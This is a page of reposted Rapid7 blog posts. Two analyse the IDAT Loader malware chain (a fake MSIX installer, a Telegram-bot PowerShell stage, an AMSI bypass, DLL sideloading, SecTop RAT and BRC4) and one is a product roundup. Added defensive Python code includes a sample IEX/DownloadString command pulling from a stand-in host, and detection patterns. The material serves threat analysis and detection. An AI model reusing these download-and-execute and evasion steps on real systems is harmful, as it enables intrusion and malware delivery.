Tag Archives: Managed Detection and Response (MDR)

Stories from the SOC Part 2: MSIX Installer Utilizes Telegram Bot to Execute IDAT Loader

Post syndicated from Tom Elkins. Original: https://blog.rapid7.com/2024/04/10/stories-from-the-soc-part-2-msix-installer-utilizes-telegram-bot-to-execute-idat-loader/

Rapid7’s Managed Detection and Response (MDR) team continuously monitors our customers’ environments, identifying emerging threats and developing new detections.

In August 2023, Rapid7 identified a new malware loader named the IDAT Loader. Malware loaders are a type of malicious software designed to deliver and execute additional malware onto a victim’s system. What made the IDAT Loader unique was the way in which it retrieved data from PNG files, searching for offsets beginning with 49 44 41 54 (IDAT).

In part one of our blog series, we discussed how a Rust based application was used to download and execute the IDAT Loader. In part two of this series, we will be providing analysis of how an MSIX installer led to the download and execution of the IDAT Loader.

While the use of MSIX packages by threat actors to distribute malicious code is not new, what distinguished this incident was the attack flow of the compromise. Based on the tactics, techniques and procedures (TTPs) observed, we believe the activity is associated with financially motivated threat groups.

Figure 1 – Attack Flow

MSIX Installers

In January of 2024, Red Canary released an article attributing different threat actors to various deployments of malicious MSIX installers. The MSIX installers employed a variety of techniques to deliver initial payloads onto compromised systems.

All the infections began with users navigating to typosquatted URLs after using search engines to find specific software package downloads. Typosquatting, also known as URL hijacking, is a technique in which threat actors register domain names that closely resemble legitimate ones in order to deceive users. Threat actors mimic the layout of the legitimate websites to lure users into downloading their initial payloads.

Additionally, threat actors utilize a technique known as SEO poisoning, enabling the threat actors to ensure their malicious sites appear near the top of search results for users.

Technical Analysis

Typo Squatted Malvertising

In our most recent incident involving the IDAT Loader, Rapid7 observed a user downloading an installer for an application named ‘Room Planner’ from a website posing as the legitimate site. The user had searched Google for the application ‘Room Planner’ and clicked on the URL hxxps://roomplannerapp.cn[.]com. Upon user interaction, the user’s browser was directed to download an MSIX package, Room_Planner-x86.msix (SHA256: 6f350e64d4efbe8e2953b39bfee1040c8b041f6f212e794214e1836561a30c23).

Figure 2 – Malvertised Site for Room Planner Application

PowerShell Scripts

During execution of the MSIX file, a PowerShell script, 1.ps1, was dropped into the folder C:\Program Files\WindowsApps\RoomPlanner.RoomPlanner_7.2.0.0_x86__s3garmmmnyfa0\ and executed. Rapid7 determined that it does the following:

  • Obtain the IP address of the compromised asset
  • Send the IP address of the compromised asset to a Telegram bot
  • Retrieve an additional PowerShell script that is hosted on the Telegram bot
  • Delete the message containing the IP address of the compromised asset
  • Invoke the PowerShell script retrieved from the Telegram bot

Figure 3 – PowerShell script 1.ps1 contained within MSIX file Room_Planner-x86.msix

In a controlled environment, Rapid7 visited the Telegram bot hosting the next stage PowerShell script and determined that it did the following:

  • Retrieve the IP address of the compromised asset by using Invoke-RestMethod to query the domain icanhazip[.]com
  • Enumerate the compromised asset’s operating system, domain and AV products
  • Send the information to the Telegram bot
  • Create a randomly generated 8-character name and assign it to the variable $JAM
  • Download a gpg file from the URL hxxps://read-holy-quran[.]group/ld/cr.tar.gpg, saving it in %APPDATA% under the name stored in $JAM
  • Decrypt the contents of the gpg file using the passphrase ‘riudswrk’, saving them as a .RAR archive in a newly created folder named after $JAM, C:\ProgramData\$JAM\cr\
  • Use tar to extract the RAR archive
  • Start an executable named run.exe from within the newly created folder
  • Create a shortcut (.lnk) file in the Startup folder, named after the randomly generated name stored in $JAM and pointing to run.exe in C:\ProgramData\$JAM\cr\, in order to establish persistence
  • Read in another PowerShell script hosted on a Pastebin site, hxxps://pastebin.pl/view/raw/a137d133, using DownloadString and execute its contents with IEX (Invoke-Expression); this script is a tool used to bypass AMSI
  • Download data from the URL hxxps://kalpanastickerbindi[.]com/1.jpg, reflectively load the contents and execute the program starting at the function EntryPoint (indicating the downloaded data is a .NET assembly)

Figure 4 – API Bot hosting PowerShell Script
Figure 5 – PowerShell AMSI Bypass Tool
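The chain above leaves a defender several process-level observables. As an added example (not Rapid7's own detection rules), the Python below runs simple rules over constructed process-creation records to flag each step: 1.ps1 launched from the WindowsApps package folder, gpg.exe decrypting a %APPDATA% file into C:\ProgramData, tar.exe extracting there, run.exe starting from a random eight-character ProgramData subfolder, the Startup .lnk, and the DownloadString/IEX pattern (including the uncommon upper/lower casing the detection list below refers to). The record format, host names, the GnuPG path and the folder name Xk3vQp9z are assumptions.

```python
import re
from typing import Dict, List, NamedTuple, Set, Tuple


class ProcEvent(NamedTuple):
    host: str
    image: str    # full path of the created process
    cmdline: str  # its command line


# Patterns for the observable steps; the exact path shapes are assumptions.
WINDOWSAPPS_PS1 = re.compile(r"\\Program Files\\WindowsApps\\.+?\.ps1", re.I)
PROGRAMDATA_RANDOM_EXE = re.compile(
    r"^C:\\ProgramData\\[A-Za-z0-9]{8}\\(?:cr\\)?[^\\]+\.exe$", re.I)
STARTUP_LNK = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+?\.lnk", re.I)
DOWNLOADSTRING = re.compile(r"downloadstring", re.I)
IEX = re.compile(r"(?<![\w-])(?:iex|invoke-expression)(?![\w-])", re.I)
CANONICAL = {"iex": "IEX", "invoke-expression": "Invoke-Expression",
             "downloadstring": "DownloadString", "invoke-restmethod": "Invoke-RestMethod"}
KEYWORD = re.compile(r"(?<![\w-])(?:" + "|".join(CANONICAL) + r")(?![\w-])", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def odd_casing(cmdline: str) -> bool:
    """True when a known keyword is spelled in a case that is neither all lower,
    all upper nor the canonical PowerShell form, e.g. 'iNvOkE-eXpReSsIoN'."""
    for m in KEYWORD.finditer(cmdline):
        tok = m.group(0)
        if tok not in (tok.lower(), tok.upper(), CANONICAL[tok.lower()]):
            return True
    return False


def is_powershell(e: ProcEvent) -> bool:
    return basename(e.image) in ("powershell.exe", "pwsh.exe")


RULES: List[Tuple[str, object]] = [
    ("PowerShell script run from an MSIX package folder",
     lambda e: is_powershell(e) and bool(WINDOWSAPPS_PS1.search(e.cmdline))),
    ("gpg decrypts an %APPDATA% file into C:\\ProgramData",
     lambda e: basename(e.image) == "gpg.exe"
     and "\\appdata\\roaming\\" in e.cmdline.lower()
     and "c:\\programdata\\" in e.cmdline.lower()),
    ("tar extracts an archive under C:\\ProgramData",
     lambda e: basename(e.image) == "tar.exe" and "c:\\programdata\\" in e.cmdline.lower()),
    ("Executable started from a random C:\\ProgramData subfolder",
     lambda e: bool(PROGRAMDATA_RANDOM_EXE.match(e.image))),
    ("Startup folder .lnk persistence",
     lambda e: bool(STARTUP_LNK.search(e.cmdline))),
    ("DownloadString fed to Invoke-Expression",
     lambda e: is_powershell(e) and bool(DOWNLOADSTRING.search(e.cmdline))
     and bool(IEX.search(e.cmdline))),
    ("PowerShell keyword in uncommon upper/lower case",
     lambda e: is_powershell(e) and odd_casing(e.cmdline)),
]


def run_rules(events: List[ProcEvent]) -> List[Tuple[str, str, str]]:
    """(host, rule name, image) for every rule that fires on an event."""
    return [(e.host, name, e.image) for e in events for name, pred in RULES if pred(e)]


def chain_confidence(hits: List[Tuple[str, str, str]]) -> Dict[str, str]:
    """Per host: 'high' once three or more distinct chain steps have fired."""
    per_host: Dict[str, Set[str]] = {}
    for host, name, _ in hits:
        per_host.setdefault(host, set()).add(name)
    return {h: ("high" if len(n) >= 3 else "low") for h, n in per_host.items()}


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSIX_DIR = r"C:\Program Files\WindowsApps\RoomPlanner.RoomPlanner_7.2.0.0_x86__s3garmmmnyfa0"

# Constructed process-creation records mirroring the chain in the text; ws02 is benign.
SAMPLE_EVENTS = [
    ProcEvent("ws01", PS, 'powershell.exe -ExecutionPolicy Bypass -File "' + MSIX_DIR + r'\1.ps1"'),
    ProcEvent("ws01", r"C:\Program Files (x86)\GnuPG\bin\gpg.exe",
              r"gpg.exe --batch --passphrase riudswrk -o C:\ProgramData\Xk3vQp9z\cr\cr.rar "
              r"-d C:\Users\alice\AppData\Roaming\Xk3vQp9z"),
    ProcEvent("ws01", r"C:\Windows\System32\tar.exe",
              r"tar.exe -xf C:\ProgramData\Xk3vQp9z\cr\cr.rar -C C:\ProgramData\Xk3vQp9z\cr"),
    ProcEvent("ws01", r"C:\ProgramData\Xk3vQp9z\cr\run.exe", r"C:\ProgramData\Xk3vQp9z\cr\run.exe"),
    ProcEvent("ws01", PS, "powershell.exe -NoP -c IeX((New-Object Net.WebClient)"
              ".DoWnLoAdStRiNg('hxxps://paste-site.example/raw/ID'))"),
    ProcEvent("ws01", PS, r"powershell.exe -c <shortcut creation elided> "
              r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xk3vQp9z.lnk"),
    ProcEvent("ws02", PS, r"powershell.exe -File C:\Scripts\inventory.ps1"),
]

if __name__ == "__main__":
    for host, name, image in run_rules(SAMPLE_EVENTS):
        print(f"{host}: {name} ({image})")
    print(chain_confidence(run_rules(SAMPLE_EVENTS)))
```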

After analysis of the AMSI (Antimalware Scan Interface) bypass tool, we observed that it was a custom tool giving credit to a website, hxxps://rastamosue[.]memory-patching-amsi-bypass, which discusses how to create a program that can bypass AMSI scanning.

AMSI is a scanning interface designed to let security products inspect scripts for potentially malicious code when a scripting engine attempts to run them. If the content is deemed malicious, AMSI tells the scripting engine (in this case PowerShell) not to run the code.

RAR Contents

Contained within the RAR file were the following files:

| File | Description |
|---|---|
| Dharna.7z | File contains the encrypted IDAT Loader config |
| Guar.xslx | File contains random bytes, not used during infection |
| Run.exe | Renamed WebEx executable file, used to sideload DLL WbxTrace.dll |
| Msvcp140.dll | Benign DLL read by Run.exe |
| PtMgr.dll | Benign DLL read by Run.exe |
| Ptusredt.dll | Benign DLL read by Run.exe |
| Vcruntime140.dll | Benign DLL read by Run.exe |
| Wbxtrace.dll | Corrupted WebEx DLL containing IDAT Loader |
| WCLDll.dll | Benign WebEx DLL read by Run.exe |

After analysis of the folder contents, Rapid7 determined that one of the DLLs, wbxtrace.dll, had a corrupted (no longer valid) digital signature, indicating that its original code had been tampered with. After analyzing the modified WebEx DLL, Rapid7 determined that it contained suspicious functions similar to those of the IDAT Loader.

Figure 6 – Analysis showing Corrupt Signature of wbxtrace.dll

Upon extracting the contents of the RAR file to the directory path C:\ProgramData\cr, the PowerShell script executes the run.exe executable.

The IDAT Loader

During execution of run.exe (a legitimate renamed WebEx executable), the executable sideloads the tampered WebEx DLL, wbxtrace.dll. Once the DLL wbxtrace.dll is loaded, the DLL executes a section of new code containing the IDAT Loader, which proceeds to read in contents from within dharna.7z.

After reading in the contents of dharna.7z, the IDAT Loader searches for the byte sequence 49 44 41 54 (IDAT) followed by C6 A5 79 EA. After locating this marker, the loader reads the next 4 bytes, E1 4E 91 99, which it uses as the decryption key for the rest of the contents. The decrypted contents contain additional code, specific DLL and executable file paths, and the final encrypted payload, which is decrypted with a 200-byte XOR key.

The IDAT Loader employs advanced techniques such as Process Doppelgänging and the Heaven’s Gate technique in order to initiate new processes and inject additional code. This strategy enables the loader to evade antivirus detection and load the final stage, SecTop RAT, into the newly created process, msbuild.exe.

We recently developed a configuration extractor capable of decrypting the final payload concealed within the encrypted files containing the IDAT (49 44 41 54) sections. The configuration extractor can be found on our Rapid7 Labs GitHub page.

After using the configuration extractor, we analyzed the SecTop RAT and determined that it communicates with the IP address 91.215.85[.]66.

Rapid7 Customers

InsightIDR and Managed Detection and Response customers have existing detection coverage through Rapid7’s expansive library of detection rules. Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. Below is a non-exhaustive list of detections deployed and alerting on activity described:

  • Attacker Technique – Advanced Installer .MSI Executable Spawns Powershell
  • Suspicious Process – Execution From Root of ProgramData
  • Suspicious Process – PowerShell Uncommon Upper And Lower Case Combinations
  • Suspicious Process – explorer.exe in Non-Standard Location

MITRE ATT&CK Techniques

| Tactic | Technique | Details |
|---|---|---|
| Execution | Command and Scripting Interpreter: PowerShell (T1059.001) | 1.ps1 is used to fingerprint the compromised machine and execute additional PowerShell scripts |
| Execution | Native API (T1106) | The IDAT injector and IDAT loader use the Heaven’s Gate technique to evade detection |
| Execution | User Execution: Malicious File (T1204.002) | User executes the binary Room_Planner-x86.msix |
| Defense Evasion | Masquerading: Match Legitimate Name or Location (T1036.005) | Malicious MSIX masquerades as the legitimate Room Planner installer |
| Defense Evasion | Deobfuscate/Decode Files or Information (T1140) | gpg.exe used to decrypt cr.tar.gpg |
| Defense Evasion | Hijack Execution Flow: DLL Search Order Hijacking (T1574.001) | run.exe loads a malicious wbxtrace.dll |
| Defense Evasion | Reflective Code Loading (T1620) | PowerShell script loads a binary hosted at kalpanastickerbindi[.]com/1.jpg |
| Defense Evasion | Process Injection (T1055) | IDAT injector implements the NtCreateSection + NtMapViewOfSection code injection technique to inject into the cmd.exe process |
| Defense Evasion | Process Injection: Process Doppelgänging (T1055.013) | IDAT loader implements the Process Doppelgänging technique to load the SecTop RAT |
| Defense Evasion | Virtualization/Sandbox Evasion: Time Based Evasion (T1497.003) | Execution delays are performed by several stages throughout the attack flow |

IOCs

| IOC | SHA256 | Notes |
|---|---|---|
| Room_Planner-x86.msix | 6f350e64d4efbe8e2953b39bfee1040c8b041f6f212e794214e1836561a30c23 | Initial installer containing PowerShell scripts |
| 1.ps1 | 928bd805b924ebe43169ad6d670acb2dfe45722e17d461ff0394852b82862d23 | Dropped and executed by the Room_Planner-x86.msix |
| wbxtrace.dll | 1D0DAF989CF28852342B1C0DFEE05374860E1300106FF7788BBA26D84549B845 | Malicious DLL executed by run.exe, the renamed Cisco Webex binary |
| Dharna.7z | B7469153DC92BF5DE9BF2521D9550DF21BC4574D0D0CFC919FF26D1071C000B2 | Encrypted payload decrypted by wbxtrace.dll |
| read-holy-quran[.]group/ld/cr.tar.gpg | | Hosts GPG file containing RAR file |
| kalpanastickerbindi[.]com/1.jpg | | Hosts .NET executable downloaded from API Bot PowerShell script |
| 91.215.85[.]66 | | SecTop RAT domain |

References

| Article | URL |
|---|---|
| MSIX installer malware delivery on the rise across multiple campaigns | https://redcanary.com/blog/msix-installers/ |
| Process Doppelgänging | https://malware.news/t/uncovering-the-serpent/76253 |
| Analysis of “Heaven’s Gate” part 1 | https://sachiel-archangel.medium.com/analysis-of-heavens-gate-part-1-62cca0ace6f0 |
| Fake Update Utilizes New IDAT Loader To Execute StealC and Lumma Infostealers | https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers/ |
| Stories from the SOC Part 1: IDAT Loader to BruteRatel | https://www.rapid7.com/blog/post/2024/03/28/stories-from-the-soc-part-1-idat-loader-to-bruteratel/ |

What’s New in Rapid7 Products & Services: Q1 2024 in Review

Post syndicated from Margaret Wei. Original: https://blog.rapid7.com/2024/04/04/whats-new-in-rapid7-products-services-q1-2024-in-review/

We kicked off 2024 with a continued focus on bringing security professionals (which if you’re reading this blog, is likely you!) the tools and functionality needed to anticipate risks, pinpoint threats, and respond faster with confidence. Below we’ve highlighted some key releases and updates from this past quarter across Rapid7 products and services—including InsightCloudSec, InsightVM, InsightIDR, Rapid7 Labs, and our managed services.

Anticipate Imminent Threats Across Your Environment

Monitor, remediate, and takedown threats with Managed Digital Risk Protection (DRP)

Rapid7’s new Managed Digital Risk Protection (DRP) service provides expert monitoring and remediation of external threats across the clear, deep, and dark web to prevent attacks earlier.

Now available in our highest tier of Managed Threat Complete and as an add-on for all other Managed D&R customers, Managed DRP extends your team with Rapid7 security experts to:

  • Identify the first signs of a cyber threat to prevent a breach
  • Rapidly remediate and takedown threats to minimize exposure
  • Protect against ransomware data leakage, phishing, credential leakage, data leakage, and provide dark web monitoring

Read more about the benefits of Managed DRP in our blog here.

Ensure safe AI development in the cloud with Rapid7 AI/ML Security Best Practices

We’ve recently expanded InsightCloudSec’s support for GenAI development and training services (including AWS Bedrock, Azure OpenAI Service and GCP Vertex) to provide more coverage so teams can effectively identify, assess, and quickly act to resolve risks related to AI/ML development.

This expanded generative AI coverage enriches our proprietary compliance pack, Rapid7 AI/ML Security Best Practices, which continuously assesses your environment through event-driven harvesting to ensure your team is safely developing with AI in a manner that won’t leave you exposed to common risks like data leakage, model poisoning, and more.

As with all critical resources connected to your InsightCloudSec environment, these risks are enriched with Layered Context to automatically prioritize AI/ML risk based on exploitability and potential impact. They’re also continuously monitored for effective permissions and actual usage to rightsize permissions to ensure alignment with LPA. In addition to this extensive visibility, InsightCloudSec offers native automation to alert on and even remediate risk across your environment without the need for human intervention.

Stay ahead of emerging threats with insights and guidance from Rapid7 Labs

In the first quarter of this year, Rapid7 initiated the Emergent Threat Response (ETR) process for 12 different threats, including (but not limited to):

  • Zero-day exploitation of Ivanti Connect Secure and Ivanti Pulse Secure gateways, the former of which has historically been targeted by both financially motivated and state-sponsored threat actors in addition to low-skilled attackers.
  • Critical CVEs affecting outdated versions of Atlassian Confluence and VMware vCenter Server, both widely deployed products in corporate environments that have been high-value targets for adversaries, including in large-scale ransomware campaigns.
  • High-risk authentication bypass and remote code execution vulnerabilities in ConnectWise ScreenConnect, widely used software with potential for large-scale ransomware attacks, providing coverage before CVE identifiers were assigned.
  • Two authentication bypass vulnerabilities in JetBrains TeamCity CI/CD server that were discovered by Rapid7’s research team.

Rapid7’s ETR program is a cross-team effort to deliver fast, expert analysis alongside first-rate security content for the highest-priority security threats to help you understand any potential exposure and act quickly to defend your network. Keep up with future ETRs on our blog here.

Pinpoint Critical and Actionable Insights to Effectively and Confidently Respond

Introducing the newest tier of Managed Threat Complete

Since we released Managed Threat Complete last year, organizations all over the globe have unified their vulnerability management programs with their threat detection and response programs. Now, teams have a unified view into the full kill chain and a tailored service to turbocharge their program, mitigate the most pressing risks and eliminate threats.

Managed Threat Complete Ultimate goes beyond our previously available Managed Threat Complete bundles to include:

  • Managed Digital Risk Protection for monitoring and remediation of threats across the clear, deep, and dark web
  • Managed Vulnerability Management for clear guidance on remediating the highest-priority risk
  • Velociraptor, Rapid7’s leading open-source DFIR framework: from monitoring and hunting to in-depth investigations into potential threats, access the tool that our Incident Response experts use on behalf of our managed customers
  • Ransomware Prevention for recognizing threats and stopping attacks before they happen with multi-layered prevention (coming soon – stay tuned)

Get to the data you need faster with new Log Search and Investigation features in InsightIDR

Our latest enhancements to Log Search and Investigations will help drive efficiency for your team and give you time back in your day-to-day—and when you really need it in the heat of an incident. Faster search times, easier-to-write queries, and intuitive recommendations will help you find event trends within your data and save you time without sacrificing results.

  • Triage investigations faster with log data readily accessible from the investigations timeline – with a click of the new “view log entry” button you’ll instantly see the context and log data behind an associated alert.
  • Create precise queries quickly with new automatic suggestions – as you type in Log Search, the query bar will automatically suggest the elements of LEQL that you can use in your query to get to the data you need—like users, IP addresses, and processes—faster.
  • Save time sifting through search results with new LEQL ‘select’ clause – define exactly what keys to return in the search results so you can quickly answer questions from log data and avoid superfluous information.

Easily view vital cloud alert context with Simplified Cloud Threat Alerts

This quarter we launched Simplified Cloud Threat Alerts within InsightIDR to make it easier to quickly understand what a cloud alert – like those from AWS GuardDuty – means, which can be a daunting task for even the most experienced analysts due to the scale and complexity of cloud environments.

With this new feature, you can view details and known issues with the resources (e.g. assets, users, etc.) implicated in the alert and have clarity on the steps that should be taken to appropriately respond to the alert. This will help you:

  • Quickly understand what a given cloud resource is, its intended purpose, what applications it supports and who “owns” it.
  • Get a clear picture around what an alert means, what next steps to take to verify the alert, or how to respond if the alert is in fact malicious.
  • Prioritize response efforts based on potential impact with insight into whether or not the compromised resource is misconfigured, has active vulnerabilities, or has been recently updated in a manner that signals potential pre-attack reconnaissance.

A growing library of actionable detections in InsightIDR

In Q1 2024 we added 1,349 new detection rules. See them in-product or visit the Detection Library for descriptions and recommendations.

Stay tuned!

As always, we’re continuing to work on exciting product enhancements and releases throughout the year. Keep an eye on our blog and release notes as we continue to highlight the latest in product and service investments at Rapid7.

Stories from the SoC Part 1: IDAT Loader to BruteRatel

Post syndicated from Tom Elkins. Original: https://blog.rapid7.com/2024/03/28/stories-from-the-soc-part-1-idat-loader-to-bruteratel/

Rapid7’s Managed Detection and Response (MDR) team continuously monitors our customers’ environments, identifying emerging threats and developing new detections.

In August 2023, Rapid7 identified a new malware loader named the IDAT Loader. Malware loaders are a type of malicious software designed to deliver and execute additional malware onto a victim’s system. What made the IDAT Loader unique was the way in which it retrieved data from PNG files, searching for offsets beginning with 49 44 41 54 (IDAT).

At the time, the loader was seen being distributed via a FakeUpdates campaign. In two recent investigations, Rapid7’s Managed Detection & Response (MDR) team observed the loader being used again. Based on the tactics, techniques and procedures (TTPs) observed, we believe the activity is associated with financially motivated threat groups.

In this two-part blog series, we will examine the attack chain observed in two separate incidents, offering in-depth analysis of the malicious behavior detected. The incidents discussed in the series stem from opportunistic infections, wherein threat groups utilize malvertising and drive-by downloads in order to have their initial malicious payloads executed by users.

This first installment focuses on an incident triggered by a user downloading an application, which subsequently triggered the execution of the IDAT Loader and the BruteRatel C4 (BRC4) framework following initial access to a compromised asset.

Technical Analysis

Stage 1: The drive by

In a recent incident, Rapid7 observed a user navigate to a website that hosted popular Korean shows. Upon attempting to watch the video, the website redirected the user through various websites before ultimately directing the user’s browser to download a supposed application named AppFile_v1.1.exe. Threat actors use website redirection to make it difficult for network technologies to scan links for malicious content.

Figure 1 – Attack Flow

Binary Analysis: Shaking off the Rust

After initial analysis of the binary AppFile_v1.1.exe, Rapid7 determined the program was written in Rust.

During execution, the program queries the name of its own executable. If the name matches AppFile_v1.1.exe, the program continues. Most sandboxes rename submitted files (sometimes to their hash), so this check helps the sample evade sandboxes by ensuring its malicious functions are never run there. If the program name does not match its original intended name, the program quits and displays an error message, showing an image that a web page could not be loaded.

Figure 2 – Error messages displayed by AppFile_v1.1.exe when checks fail

Next, the program will check to see if it resides within a debugger by querying the function IsDebuggerPresent. If the check passes, it will decrypt a hard-coded string that resolves to “Normal”. If not, the program will decrypt another hard-coded string that resolves to “Debugger” and then exit.

Once the anti-debug check passes, the program retrieves an encrypted string and XOR decrypts it, revealing the URL hxxps://cdn-network-services-001[.]com/update/minor/1/release.json.

The program then performs anti-analysis checks, specifically querying the username and the open processes and comparing them against a list of known sandbox usernames and tools. The list of usernames and processes is also XOR-encrypted and is decrypted at runtime. Based on open source intelligence, we determined that another malware family known as Serpent Stealer contains a similar table of usernames. See Appendix A below for the complete list.

Table 1 – Usernames and Known Sandbox Tools to Check Against
Figure 3 – Sample Output from x64Debugger showing list of processes to check for

If any of the checks fail, the program exits and displays the error message box. If the checks pass, the program uses the Rust library tokio-1.32.0/src/net/tcp/stream.rs to read data from the decrypted URL and store the contents in memory.

Upon initial analysis, the downloaded data appeared to be encoded. Subsequently, the data is passed into a function tasked with decoding it. The decoding process involves reading each byte and subtracting the hexadecimal value 32.

Figure 4 – Data Decoding Routine
Figure 5 – Decoded downloaded bytes using CyberChef

After the downloaded data is decoded, the program XOR decrypts another string, revealing a path to the executable C:\Windows\system32\werfault.exe. Using syscalls, the program then does the following:

Table 2 – Syscalls Used by Rust Loader

After analysis of the decoded binary, we determined that it was another executable written in Rust. The program’s executable contains a zip archive within the .rdata section. During execution, the program generates a folder with a randomly generated name in the %TEMP% directory and extracts the contents of the archive into this newly created folder.

Figure 6 – ZIP Archive Contained Within New Rust Executable

The archive contained a DLL, msidcrl40.dll, an executable named live.exe and an encrypted file, dynatron.mdb. Initial analysis of the DLL msidcrl40.dll showed that the DLL’s signature was corrupted, indicating the DLL was tampered with. Further analysis showed that the DLL contained code related to the IDAT Loader.

IDAT Loader

After the Rust program drops the contents of the zip archive, it executes the binary live.exe, which sideloads the DLL msidcrl40.dll containing the IDAT Loader code.

After live.exe loads msidcrl40.dll, the DLL executes the function containing the IDAT Loader. The IDAT Loader then reads the encrypted contents of the file dynatron.mdb, searching for the byte sequence 49 44 41 54 (IDAT) followed by C6 A5 79 EA. After decrypting the contents, the loader decompresses them using RtlDecompressBuffer and executes additional code in a newly created process, cmd.exe.

The IDAT loader employs advanced techniques such as Process Doppelgänging and the Heaven’s Gate technique in order to initiate new processes and inject additional code.

The code contained within cmd.exe is responsible for decrypting the final payload and injecting it into a newly created process, msbuild.exe.

Using our IDAT Loader config extractor, we were able to extract the final payload and determined that it was SecTop RAT. During execution of the SecTop RAT, we observed that it communicated with the IP address 152.89.217[.]215.

Figure 7 – SecTop RAT payload extracted by our IDAT Loader Python Script

Post-Exploitation: BRC4 Deployment

After the SecTop RAT was executed successfully, Rapid7 observed follow-on activity in which the threat actor executed another version of the IDAT loader from within the folder path C:\ProgramData\. We observed the following related files were dropped by the threat actor into C:\ProgramData:

Table 2: Files Dropped by Threat Actor into C:\ProgramData\

After analysis of the files, we determined that rvm.exe was a renamed copy of rvmsetup.exe, a legitimate tool that is part of the VMware Tools toolset and is used to join a VMware source virtual machine to an Active Directory domain. We also observed that the binary vmtools.dll had a corrupted signature, indicating the binary’s code had been tampered with, and that it contained code related to the IDAT Loader.

During execution of the executable, rvm.exe, the program loads vmtools.dll. After vmtools.dll is loaded, the DLL is directed to execute a function that contains the IDAT Loader. The IDAT Loader proceeds to read in contents from within spank.mpg, searching for the same offset, 49 44 41 54 (IDAT) followed by C6 A5 79 EA. After decrypting the contents within spank.mpg, the IDAT Loader spawns a new process, cmd.exe, injecting additional code that is responsible for decrypting the final payload and injecting it into a newly created process, explorer.exe.
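The marker search described here for dynatron.mdb and spank.mpg, and in Part 2 of this series for dharna.7z (where the key bytes E1 4E 91 99 are given), can be turned into a triage check. The Python below is an added example, not Rapid7's config extractor: it locates every IDAT + C6 A5 79 EA marker in a carrier file, reports the 4 bytes that follow as the stage-1 key, and includes the repeating-key XOR named for the final payload. The cipher of the first stage and the location of the 200-byte key are not stated on the page, so the example stops at the key, and the sample carrier is constructed.

```python
import struct
from dataclasses import dataclass
from typing import Dict, List

IDAT_TAG = bytes.fromhex("49444154")        # "IDAT"
LOADER_MAGIC = bytes.fromhex("C6A579EA")    # bytes the loader expects right after IDAT
MARKER = IDAT_TAG + LOADER_MAGIC
PNG_SIGNATURE = bytes.fromhex("89504E470D0A1A0A")
KEY_LEN = 4


@dataclass
class IdatHit:
    offset: int          # where "IDAT" sits in the carrier file
    key: bytes           # the 4 bytes following the magic (stage-1 decryption key)
    payload_offset: int  # first byte of the encrypted body


def find_idat_markers(data: bytes) -> List[IdatHit]:
    """Return every IDAT+magic marker with its key. A plain PNG IDAT chunk is
    followed by zlib data, not by C6 A5 79 EA, so it does not match."""
    hits: List[IdatHit] = []
    pos = data.find(MARKER)
    while pos != -1:
        key_start = pos + len(MARKER)
        if key_start + KEY_LEN <= len(data):   # truncated carrier: no usable key
            hits.append(IdatHit(pos, data[key_start:key_start + KEY_LEN], key_start + KEY_LEN))
        pos = data.find(MARKER, pos + 1)
    return hits


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, the operation the text names for the final payload
    (its 200-byte key). Where that key lives in the blob is not on the page."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def triage(data: bytes) -> Dict[str, object]:
    """Summary an analyst can log for a suspected carrier file."""
    hits = find_idat_markers(data)
    return {
        "png_signature": data.startswith(PNG_SIGNATURE),
        "marker_count": len(hits),
        "keys": [h.key.hex() for h in hits],
        "payload_offsets": [h.payload_offset for h in hits],
    }


def build_sample_carrier() -> bytes:
    """Constructed sample, not a real artefact: PNG signature, one benign IDAT
    chunk (length, tag, zlib-looking data, CRC), padding, then a loader marker
    with the key bytes reported in Part 2 (E1 4E 91 99) and a dummy body."""
    benign_chunk = struct.pack(">I", 4) + IDAT_TAG + b"\x78\x9c\x01\x00" + b"\x00" * 4
    loader_blob = MARKER + bytes.fromhex("E14E9199") + b"\x41" * 32
    return PNG_SIGNATURE + benign_chunk + b"\x00" * 16 + loader_blob


if __name__ == "__main__":
    print(triage(build_sample_carrier()))
```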

Using our static config extractor, we extracted the final payload, a 64-bit executable. During initial analysis of the final payload, we observed that the program used the API functions VirtualAlloc and VirtualProtect: VirtualAlloc to read additional code, including encrypted data, into a new region of memory, and VirtualProtect to mark that newly allocated region (containing the new code) as executable. We also observed that the 64-bit executable (obtained with the IDAT Loader Python script) had the capability to perform process hollowing by starting a new process, notepad.exe, and injecting the code into it.

Figure 8 – Final Payload showing Injection into notepad.exe

The newly allocated code was responsible for decrypting the encrypted data using RC4, copying the decrypted code into an allocated memory buffer via VirtualAlloc, and setting the memory buffer to have executable permission using VirtualProtect. Rapid7 determined the decrypted code was a Brute Ratel C4 (BRC4) “badger”.

Brute Ratel originated as a post-exploitation tool intended for penetration testers, designed (as of December 2020) to mimic adversary tactics. Its development aimed to replicate the functionality of established Command and Control (C2) software such as Cobalt Strike, Mythic and Sliver. Following a successful compromise of a target, the attacker deploys the Brute Ratel “badger,” which is tasked with establishing communication with the attacker’s Command and Control domain.

During execution of the BRC4 program, we observed that it reached out to the domain updatenazure[.]com.

Figure 9 – Debugging BRC4 C2 Communication

After the BRC4 program was executed, we observed the threat actor attempting to enumerate the domain controller by using the command nltest /dclist.

Rapid7 Customers

InsightIDR and Managed Detection and Response customers have existing detection coverage through Rapid7’s expansive library of detection rules. Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. Below is a non-exhaustive list of detections deployed and alerting on activity described:

  • Network Discovery – Nltest Enumerate Domain Controllers
  • Suspicious Process – Execution From Root of ProgramData
  • Suspicious Process – PowerShell Uncommon Upper And Lower Case Combinations
  • Suspicious Process – explorer.exe in Non-Standard Location
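As an added illustration of what the four detections above look for, here is a toy re-implementation run over constructed process-start events. It is not Rapid7's rule logic (only the rule names are taken from the list); the event fields, path conventions and the PowerShell casing heuristic are assumptions made for the example.

```python
# Added example: toy versions of the four listed detections over constructed
# process-start events. Illustration only, not Rapid7's rule logic.
import re
from dataclasses import dataclass
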